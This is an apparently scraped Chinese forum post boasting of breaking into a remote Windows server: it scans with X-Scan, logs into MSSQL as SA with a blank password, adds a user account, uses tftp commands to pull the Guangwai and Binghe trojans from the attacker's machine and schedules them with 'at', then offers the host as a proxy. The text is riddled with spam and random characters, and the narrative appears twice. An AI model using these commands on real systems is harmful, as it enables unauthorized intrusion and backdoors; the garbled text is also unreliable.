简单入侵简单入侵 bbs.54master.com$]"~.k3H2n
看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!3a3e:G&t*X,j
机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
*Y1K2Q:c5G4g0}%/网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术(玩黑必备一:眼睛长到头顶上)
-p.r&N'h3A/D#P-V$O!N c- 畅通网络 因为有我X-SCAN扫描结果报告:
-l+d#r,b3B(w;b8K%p我是网管论坛“端口开放:1433、3389
+q8q2a;h)h8^5|7o- 畅通网络 因为有我ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL” - 畅通网络 因为有我;s'j.D/i7/8] }.u
呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!我是网管论坛4X1X5B;S&C ?4h-L1E
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,.i%H&f0C+B-s"Y
你趁他们还在地球快去拜师学艺啊!
7q.Z8A1T;F9w(m网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术再接着卖我的黄婆烂瓜…… bbs.54master.com2c.e,m0A0N4B!H
3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,)m x-o;E+x/E4{%]
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~ 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术(P;A(d:~&G.H+u X
废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
+f-N'Z8Q*W6f2_+{- 畅通网络 因为有我!55555……输入法漏洞是玩不成了。
"[1y$s g8X*b一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:
-E'C2/!`6X1q3H+R%dbbs.54master.comSA,密码为空,点“连接”---“:(连接成功!” &n.F$l;d(H+Y&y)z
进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
&L9}/Q.B4j$[+^%m!g网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开bbs.54master.com;_0G&o9D.o#d"e4W!g9U
WIN2000的远程连接用端口-3389端口呢?
/h"`%z1Y7W算了,越想越乱,忙我的正事吧。 - 畅通网络 因为有我(A1o']'~$A
为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些bbs.54master.com:j:N,l$b2`/O9T
196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧? bbs.54master.com"g5S:[6o1[9~,~7k
再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,3S-K8I&B%e#]
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛! n(Y2E.n'|*C2d0b0Z
为1234的帐户进行连接,这帐户对我来说根本 bbs.54master.com+R/_(A0x&j2F,v6i.A:?
没用……
,i9w3W2D*D:qbbs.54master.com现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
j&c'a/F,w l'u9s*{#xbbs.54master.com听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,我是网管论坛1E.K-z4P.t%t
赶明儿我让符大虾在你机子里也放个木马,这样你就 - 畅通网络 因为有我8~)T'J7j;W3e
能深刻理解啥叫木马了~~ bbs.54master.com5w.F*U:K9p0m5m
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也'x)t&g:P&_ b5h
曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
,n&Z&_1o'T9E"i打开TFTP(一个能把你的PC变成FTP服务器的小程序)—— 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术5J(y"a8s6K%l1F,i
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!;F!B"f$p#V7B)t
命令:"tftp -i xx.xx.xx.xx get gw.exe c:/gw.exe"
1U'~7C7N(h- 畅通网络 因为有我5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~ 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术$D"@*O3//o,C:e9Z
现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入我是网管论坛6w%i$S-j/?*S6t.q/{&O1N
程序起动时间命令"at 09:37 c:/gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,0A)o$j4t!J(r5Y2x
ID=1” 3d+U3A(o'y'q6f([
OK!二分钟后将运行我的“广外女生”了! 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术7n1I9{,D!y$d0T
打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!0W+p&F;D4?2q:B1T!a
“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
7M;T6e8T/Y$e(_;|我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!是远程主机的“广外”没有运行还是我对这控制端程序的操
"t;k)J%V$B2W&W作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。 我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!.X']$n0A:E&v.o
看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200
//0m:v1P8`我是网管论坛多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!$d7a,k0m8z /;L6m!Z
对冰河的界面操作也不会似“广外”那嚒陌生……
9S*`+`-n:T'd/V我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:/inetpub/GG.exe"网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术6n;m7`#D+e3d8K
(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下)
,c s:K#B'@网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去…… 我是网管论坛%])F'_9/.e-A#^
已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,- 畅通网络 因为有我&j,U2U+T#/$r6O
反馈信息:10:30”。“at 10:32 c:/inetpub/GG.exe”,反馈信息“运行新任务,ID=1”
&Q*a2X!O;])M/k2y-A't二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、
,/)m*Y#j;T.c!G%k7y7j'O%L'v添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
8m1K){ F8?*{.O8} F*Y- 畅通网络 因为有我……
2o$`5^8M0@!o- 畅通网络 因为有我现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进
:C&]'G!{9s*A我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用0J0b"C8H5[!f!t6^
“肉机”贡献出来的。
看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!3a3e:G&t*X,j
机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
*Y1K2Q:c5G4g0}%/网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术(玩黑必备一:眼睛长到头顶上)
-p.r&N'h3A/D#P-V$O!N c- 畅通网络 因为有我X-SCAN扫描结果报告:
-l+d#r,b3B(w;b8K%p我是网管论坛“端口开放:1433、3389
+q8q2a;h)h8^5|7o- 畅通网络 因为有我ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL” - 畅通网络 因为有我;s'j.D/i7/8] }.u
呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!我是网管论坛4X1X5B;S&C ?4h-L1E
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,.i%H&f0C+B-s"Y
你趁他们还在地球快去拜师学艺啊!
7q.Z8A1T;F9w(m网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术再接着卖我的黄婆烂瓜…… bbs.54master.com2c.e,m0A0N4B!H
3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,)m x-o;E+x/E4{%]
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~ 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术(P;A(d:~&G.H+u X
废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
+f-N'Z8Q*W6f2_+{- 畅通网络 因为有我!55555……输入法漏洞是玩不成了。
"[1y$s g8X*b一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:
-E'C2/!`6X1q3H+R%dbbs.54master.comSA,密码为空,点“连接”---“:(连接成功!” &n.F$l;d(H+Y&y)z
进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
&L9}/Q.B4j$[+^%m!g网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开bbs.54master.com;_0G&o9D.o#d"e4W!g9U
WIN2000的远程连接用端口-3389端口呢?
/h"`%z1Y7W算了,越想越乱,忙我的正事吧。 - 畅通网络 因为有我(A1o']'~$A
为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些bbs.54master.com:j:N,l$b2`/O9T
196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧? bbs.54master.com"g5S:[6o1[9~,~7k
再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,3S-K8I&B%e#]
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛! n(Y2E.n'|*C2d0b0Z
为1234的帐户进行连接,这帐户对我来说根本 bbs.54master.com+R/_(A0x&j2F,v6i.A:?
没用……
,i9w3W2D*D:qbbs.54master.com现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
j&c'a/F,w l'u9s*{#xbbs.54master.com听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,我是网管论坛1E.K-z4P.t%t
赶明儿我让符大虾在你机子里也放个木马,这样你就 - 畅通网络 因为有我8~)T'J7j;W3e
能深刻理解啥叫木马了~~ bbs.54master.com5w.F*U:K9p0m5m
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也'x)t&g:P&_ b5h
曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
,n&Z&_1o'T9E"i打开TFTP(一个能把你的PC变成FTP服务器的小程序)—— 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术5J(y"a8s6K%l1F,i
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!;F!B"f$p#V7B)t
命令:"tftp -i xx.xx.xx.xx get gw.exe c:/gw.exe"
1U'~7C7N(h- 畅通网络 因为有我5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~ 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术$D"@*O3//o,C:e9Z
现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入我是网管论坛6w%i$S-j/?*S6t.q/{&O1N
程序起动时间命令"at 09:37 c:/gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,0A)o$j4t!J(r5Y2x
ID=1” 3d+U3A(o'y'q6f([
OK!二分钟后将运行我的“广外女生”了! 网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术7n1I9{,D!y$d0T
打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!0W+p&F;D4?2q:B1T!a
“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
7M;T6e8T/Y$e(_;|我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!是远程主机的“广外”没有运行还是我对这控制端程序的操
"t;k)J%V$B2W&W作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。 我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!.X']$n0A:E&v.o
看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200
//0m:v1P8`我是网管论坛多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!$d7a,k0m8z /;L6m!Z
对冰河的界面操作也不会似“广外”那嚒陌生……
9S*`+`-n:T'd/V我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:/inetpub/GG.exe"网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术6n;m7`#D+e3d8K
(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下)
,c s:K#B'@网管论坛,网管软件,企业网管论坛,企业网管软件,企业网管教程,网吧网管论坛,网吧网管软件,网吧网管技术缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去…… 我是网管论坛%])F'_9/.e-A#^
已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,- 畅通网络 因为有我&j,U2U+T#/$r6O
反馈信息:10:30”。“at 10:32 c:/inetpub/GG.exe”,反馈信息“运行新任务,ID=1”
&Q*a2X!O;])M/k2y-A't二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、
,/)m*Y#j;T.c!G%k7y7j'O%L'v添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
8m1K){ F8?*{.O8} F*Y- 畅通网络 因为有我……
2o$`5^8M0@!o- 畅通网络 因为有我现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进
:C&]'G!{9s*A我是网管论坛,企业网管的天堂,网吧网管的乐园。网管软件下载、网管教程下载。中国最大的网管交流论坛!这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用0J0b"C8H5[!f!t6^
“肉机”贡献出来的。
扫一扫
1236
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
